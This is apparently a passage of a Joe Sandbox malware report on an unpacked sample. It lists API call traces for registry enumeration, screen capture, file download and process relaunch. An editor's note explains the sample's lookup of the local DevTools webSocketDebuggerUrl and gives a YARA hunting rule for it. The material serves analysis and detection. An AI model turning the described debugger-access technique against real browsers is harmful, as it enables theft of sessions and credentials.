                                • Instruction Fuzzy Hash: CF025B30A01206CFCB65DF69D989B6ABBF5EF45314F19C069E41D9B262DB31ED42CB80
                                APIs
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • RegOpenKeyExA.ADVAPI32(?,0179B758,00000000,00020019,?), ref: 00C937BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00C937F7
                                • wsprintfA.USER32 ref: 00C93822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00C93840
                                • RegCloseKey.ADVAPI32(?), ref: 00C9384E
                                • RegCloseKey.ADVAPI32(?), ref: 00C93858
                                • RegQueryValueExA.ADVAPI32(?,0179EA50,00000000,000F003F,?,?), ref: 00C938A1
                                • lstrlen.KERNEL32(?), ref: 00C938B6
                                • RegQueryValueExA.ADVAPI32(?,0179EA80,00000000,000F003F,?,00000400), ref: 00C93927
                                • RegCloseKey.ADVAPI32(?), ref: 00C93972
                                • RegCloseKey.ADVAPI32(?), ref: 00C93989
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: same set of memory-dump files as listed for the first function above
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 3f1fb0ffa882d7571f1c5a7639ef3c6d25d935f6852c5dd2db5dc7ca283cef85
                                • Instruction ID: 76f9efafb8482254a0abe51ece98115a0df05413c1c94143d0f3e0df392d8080
                                • Opcode Fuzzy Hash: 3f1fb0ffa882d7571f1c5a7639ef3c6d25d935f6852c5dd2db5dc7ca283cef85
                                • Instruction Fuzzy Hash: 8F917EB2A00249DFCF10DFA5DD88AEEB7B9FB48310F158569E509BB211D731AE45CB90
                                APIs
                                • InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C790DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00C790FC
                                • InternetCloseHandle.WININET(00000000), ref: 00C79109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00C79166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C79197
                                • InternetCloseHandle.WININET(00000000), ref: 00C791A2
                                • InternetCloseHandle.WININET(00000000), ref: 00C791A9
                                • strlen.MSVCRT ref: 00C791BA
                                • strlen.MSVCRT ref: 00C791ED
                                • strlen.MSVCRT ref: 00C7922E
                                • strlen.MSVCRT ref: 00C7924C
                                  • Part of subcall function 00C78980: std::_Xinvalid_argument.LIBCPMT ref: 00C78996
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: same set of memory-dump files as listed for the first function above
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: c9697be93f05959e7c2fed5deb5ee61a591ba9b3a248b83745138c650621202d
                                • Instruction ID: ff39a48abcff5ad97295a60ac6f6a1a462615c9e5b27d33f8866680f0da96733
                                • Opcode Fuzzy Hash: c9697be93f05959e7c2fed5deb5ee61a591ba9b3a248b83745138c650621202d
                                • Instruction Fuzzy Hash: 4A51C5717402066BDB10DBA9DC89BDEF7F9EB88710F144169F905E3280DBB4EA4887A5
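The function above (calls at 00C790DF through 00C7924C) opens http://localhost:9229/json with WinINet, reads the response with InternetReadFile and then looks for the substrings "webSocketDebuggerUrl": and "ws:// in it. /json is the discovery endpoint of the DevTools remote-debugging protocol, exposed by Chromium-based browsers and by the Node.js inspector when remote debugging is enabled: it lists the debuggable targets, each with a webSocketDebuggerUrl that gives full debugger access over a WebSocket. The report shows only the lookup; what the sample does with the extracted URL is not visible on this page. Since the Yara matches row for this function is empty, the hunting rule below is added by the editor and is not part of the Joe Sandbox report. The three literal strings are taken from the function's String ID row; the rule name, the meta fields and the any-port generalization of the URL are the editor's assumptions. The strings are what the report shows in the unpacked code at 00C70000, so the rule is meant for unpacked memory dumps or live process memory rather than for the file on disk, which may not contain them in clear.

```yara
// Hunting rule added by the editor; not from the Joe Sandbox report.
// Literal strings come from the "String ID" row of the function at
// 00C790DF-00C7924C; rule name, meta fields and the any-port regex are assumptions.
rule stealc_devtools_json_websocket_debugger_url
{
    meta:
        description = "Code that fetches the DevTools /json discovery endpoint on localhost and extracts webSocketDebuggerUrl"
        reference   = "Joe Sandbox analysis ID 1560648 (file.exe), memory dump at 00C70000"
        scope       = "unpacked memory dumps and live process memory"

    strings:
        // Exact URL passed to InternetOpenUrlA at 00C790FC
        $url_observed = "http://localhost:9229/json" ascii
        // Same endpoint on any port, to catch builds that change the port (assumption)
        $url_anyport  = /http:\/\/localhost:[0-9]{2,5}\/json/ ascii
        // Substrings the function looks for in the HTTP response
        $key = "\"webSocketDebuggerUrl\":" ascii
        $ws  = "\"ws://" ascii

    condition:
        $key and $ws and ($url_observed or $url_anyport)
}
```

Run it first against the 00C70000 dump (yara -s on the .sdmp file) to confirm that all three strings fire, then against a clean corpus before deploying it, because "ws:// and webSocketDebuggerUrl also occur in legitimate DevTools clients; the localhost /json URL is the discriminating string. The condition deliberately does not use pe.imports for wininet.dll: that check only works on an object with an intact import table, which a memory dump need not have.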
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00C916A1
                                • lstrcpy.KERNEL32(00000000,0178A708), ref: 00C916CC
                                • lstrlen.KERNEL32(?), ref: 00C916D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C916F6
                                • lstrcat.KERNEL32(00000000,?), ref: 00C91704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9172A
                                • lstrlen.KERNEL32(0179E6C8), ref: 00C9173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C91762
                                • lstrcat.KERNEL32(00000000,0179E6C8), ref: 00C9176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C91792
                                • ShellExecuteEx.SHELL32(?), ref: 00C917CD
                                • ExitProcess.KERNEL32 ref: 00C91803
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: same set of memory-dump files as listed for the first function above
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: c9a3c21b93971f03658359f36ef76f8a5d2b9657a21dcf37817f86ce45386a8a
                                • Instruction ID: 6248028b11accba5645027e6ad74e6e989bc3174e15398cec0c89795f759379e
                                • Opcode Fuzzy Hash: c9a3c21b93971f03658359f36ef76f8a5d2b9657a21dcf37817f86ce45386a8a
                                • Instruction Fuzzy Hash: BF51A270A0121BAFDB51DFA5CD89A9EBBF9EF59300F088125E915E3251DB30AF05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C8F026
                                • lstrlen.KERNEL32(00000000), ref: 00C8F035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00C8F053
                                • StrStrA.SHLWAPI(00000000,?), ref: 00C8F081
                                • lstrlen.KERNEL32(?), ref: 00C8F094
                                • lstrlen.KERNEL32(00000000), ref: 00C8F0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00C8F0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00C8F13F
                                Strings
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: same set of memory-dump files as listed for the first function above
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 054b83823b93183ca1fe673f85aeacd0dacfa4c4d0ae505b0f1d3de3d56f1aa6
                                • Instruction ID: b8b7dc8e5e8cf8df9bd3ea6915576fbe93db4984ba420184ee4c84f382c5944d
                                • Opcode Fuzzy Hash: 054b83823b93183ca1fe673f85aeacd0dacfa4c4d0ae505b0f1d3de3d56f1aa6
                                • Instruction Fuzzy Hash: 59518131A101059FCB21BF79DC49A6E7BE4EF95314F09817CF85A9B212DB30ED02A794
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(01798B58,00EA9BD8,0000FFFF), ref: 00C7A026
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7A053
                                • lstrlen.KERNEL32(00EA9BD8), ref: 00C7A060
                                • lstrcpy.KERNEL32(00000000,00EA9BD8), ref: 00C7A08A
                                • lstrlen.KERNEL32(00CA4C4C), ref: 00C7A095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7A0B2
                                • lstrcat.KERNEL32(00000000,00CA4C4C), ref: 00C7A0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7A0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7A0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7A114
                                • SetEnvironmentVariableA.KERNEL32(01798B58,00000000), ref: 00C7A12F
                                • LoadLibraryA.KERNEL32(01785208), ref: 00C7A143
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: same set of memory-dump files as listed for the first function above
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 6062684293df59417623a0c5fa5810504e14f5e6cb9c1a77661334cafcdf6121
                                • Instruction ID: 9c9ef0da6710a3fcd039dd54a4c0b2fc00b71bdf107a7e50f88419ffcac5294c
                                • Opcode Fuzzy Hash: 6062684293df59417623a0c5fa5810504e14f5e6cb9c1a77661334cafcdf6121
                                • Instruction Fuzzy Hash: 01910530A00600CFD7309FA5DD85A6A37A5FBD9705F44C528E51E9B2A2EF75EE44CB82
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8C8A2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8C8D1
                                • lstrlen.KERNEL32(00000000), ref: 00C8C8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8C932
                                • StrCmpCA.SHLWAPI(00000000,00CA4C3C), ref: 00C8C943
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: same set of memory-dump files as listed for the first function above
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 27ded22ac94c7fae2a8df6b8bfcca527d36dd176de6dd259c97618a60522cade
                                • Instruction ID: f9e71b80e9c5e8612cc8f79e7d0d62a23f11f5c3912d55d3f1c5dba55eee05ac
                                • Opcode Fuzzy Hash: 27ded22ac94c7fae2a8df6b8bfcca527d36dd176de6dd259c97618a60522cade
                                • Instruction Fuzzy Hash: 8D61C371E0121A9FCB10EFB5C8C8AEE7BF8EF0A348F044065E855E7241DB349A059BA4
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00C90CF0), ref: 00C94276
                                • GetDesktopWindow.USER32 ref: 00C94280
                                • GetWindowRect.USER32(00000000,?), ref: 00C9428D
                                • SelectObject.GDI32(00000000,00000000), ref: 00C942BF
                                • GetHGlobalFromStream.COMBASE(00C90CF0,?), ref: 00C94336
                                • GlobalLock.KERNEL32(?), ref: 00C94340
                                • GlobalSize.KERNEL32(?), ref: 00C9434D
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 647a5c2df2a2e39ce65228fa39fb6f5d62325b19ff6b4396ec24958fe3913198
                                • Instruction ID: 7a815cd49e93b998380bc5f7112497a24c9e5b9928b75c5948ead26a6519da01
                                • Opcode Fuzzy Hash: 647a5c2df2a2e39ce65228fa39fb6f5d62325b19ff6b4396ec24958fe3913198
                                • Instruction Fuzzy Hash: 32514D75A10209AFCB10DFA5DD89EAEB7B9FF89310F104019F905A3251DB30AE059BA0
                                APIs
                                • lstrcat.KERNEL32(?,0179ECF0), ref: 00C8E00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C8E037
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E07D
                                • lstrcat.KERNEL32(?,?), ref: 00C8E098
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0AC
                                • lstrcat.KERNEL32(?,0178A5C8), ref: 00C8E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0D4
                                • lstrcat.KERNEL32(?,0179DE70), ref: 00C8E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C8E126
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 769e6a26741377c9b7b8648283b46ef790245b68c85581cee3ae1bc5b8c1f30a
                                • Instruction ID: f725f8d31074e002bcd4932827f26a95c39db76c20901b386e75b9dc49c1bfeb
                                • Opcode Fuzzy Hash: 769e6a26741377c9b7b8648283b46ef790245b68c85581cee3ae1bc5b8c1f30a
                                • Instruction Fuzzy Hash: BA617F7191011CEFCB55EB64CC88ADD77B4FF8C310F1089A5A619A3251DB70AF85AF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C76AFF
                                • InternetOpenA.WININET(00C9CFEC,00000001,00000000,00000000,00000000), ref: 00C76B2C
                                • StrCmpCA.SHLWAPI(?,0179F498), ref: 00C76B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00C76B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C76B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00C76BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C76BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00C76BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00C76C10
                                • InternetCloseHandle.WININET(00000000), ref: 00C76C17
                                • InternetCloseHandle.WININET(?), ref: 00C76C21
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: c355c6faa248e1734934d4bbef5aebeabad0f6742b62385679084357bca9fe77
                                • Instruction ID: 398944897c4ea75fa37b0c9841f149569400fc3f38e4802d6c30017dbcbcbc57
                                • Opcode Fuzzy Hash: c355c6faa248e1734934d4bbef5aebeabad0f6742b62385679084357bca9fe77
                                • Instruction Fuzzy Hash: 53418475B00609AFDB20DF65DC85FAE77B8EB49701F108554FA09E7280DF70AE449BA4
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7BC1F
                                • lstrlen.KERNEL32(00000000), ref: 00C7BC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7BC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7BC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7BCAC
                                • lstrlen.KERNEL32(00CA4AD4), ref: 00C7BD23
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 7d1beaa2c3fc2afda7219e35b130230fa32c49604649599b8837eae648796db0
                                • Instruction ID: f50c416549b1d044413ebfb7defc9a8a57ce79bcac9f4c104111f7dc3bd2cf73
                                • Opcode Fuzzy Hash: 7d1beaa2c3fc2afda7219e35b130230fa32c49604649599b8837eae648796db0
                                • Instruction Fuzzy Hash: A4A18B30A012058FCB25DF29D949BAEB7F4EF59304F19C069E81EAB262DB31ED45DB50
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C95F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00C96014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 00C9609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 00C960D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: 32514dcf1d5bbc38306e7cbb3dcceafa0ede90fb450c0dbb690dfbe85cd87e2f
                                • Instruction ID: de63456eab265c53fe92115da2c8c7f10b743e5c3722d288fb737a5292370014
                                • Opcode Fuzzy Hash: 32514dcf1d5bbc38306e7cbb3dcceafa0ede90fb450c0dbb690dfbe85cd87e2f
                                • Instruction Fuzzy Hash: E2619E70B00604DBDF18CF9CC8D996EB7B6EF84714B244A59E5928B781D731EE81CB98
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C8E07D
                                • lstrcat.KERNEL32(?,?), ref: 00C8E098
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0AC
                                • lstrcat.KERNEL32(?,0178A5C8), ref: 00C8E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00C8E0D4
                                • lstrcat.KERNEL32(?,0179DE70), ref: 00C8E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C8E126
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: 607c7df0bdbb6dadc436b5389b16f0dcb38db2648733ec010df5a325607a4da1
